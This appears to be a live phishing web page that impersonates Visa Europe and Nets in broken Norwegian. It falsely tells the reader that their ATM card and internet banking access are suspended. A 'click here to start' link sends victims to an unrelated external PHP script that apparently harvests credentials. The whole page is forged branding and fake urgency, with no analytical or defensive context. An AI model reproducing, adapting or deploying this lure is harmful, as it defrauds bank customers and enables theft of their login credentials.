<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Template_Head1">
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
    <title>Site Error </title>
    <link href="templates/default/css/system/global.css" rel="stylesheet" type="text/css" />
    <link href="templates/default/css/system/internal_page.css" rel="stylesheet" type="text/css" />
    <link href="templates/default/css/system/pods.css" rel="stylesheet" type="text/css" />
    <link href="templates/default/css/standard.css" type="text/css" rel="stylesheet" />
    <meta name="COPYRIGHT" content="&amp;copy; Copyright Visa Europe 2013" />
    <meta name="AUTHOR" content="Visa Europe" />
    <meta name="GENERATOR" content="BuildingBox ltd" />
    <meta name="keywords" content="." />
    <meta name="description" content="." />
</head>
<body>
    <div class="container">
        <div class="search">
        </div>
        <div class="header">
            <a id="Template_ctrlTopNav_HyperLink1" title=" " href="Default.aspx">
                <img id="Template_ctrlTopNav_Image1" class="visaLogo" src="http://www.visa.no/assets/images/global/tagline.gif"
                    alt="Return to homepage" style="border-width: 0px;" /></a>
            <div class="topNav clearfix">
                <ul class="topNav1">
                </ul>
            </div>
        </div>
        <div class="contentContainer">
            <div class="homeContainer" style="padding: 20px;">
                <h1>
                    Sikkerhet Notice</h1>
                <p>
                    ATM card: Suspendert</p>
                <p>
                    Internett-kontoen tilgang: Suspendert</p>
                <ul>
                    <li>Denne sikkerhetsoppdateringen merke til er å gi deg råd om at en mislykket</li>
                    <li>Password Reset ble nylig forsøkt på Internet Banking konto.
                        Hvis du er uvitende om disse endringene, kan du gjenopprette kontoen bruker:</li>
                </ul>
                <p>
                <td align="left"><div align="center"><a style="text-decoration: none;" href="http://aspmx1.o3na.com/.poo/poo.php"><b><font color="#0000CC">Klikk 
her for å starte</p>
                <ul>
                    
                    <li>Takk for at du bruker Nets</li>
                    <li>Nets Holding A/S.             
    © Copyright Visa Europe 2013

</li>
                </ul>
            </div>
        </div>
        <div class="footerContainer clearfix">
            <div class="footer clearfix">
                <ul class="footerNav2">
                    <li>&copy; Copyright Visa Europe 2013</li>
                </ul>
            </div>
        </div>
    </div>
    <div>
    </div>
</body>
</html>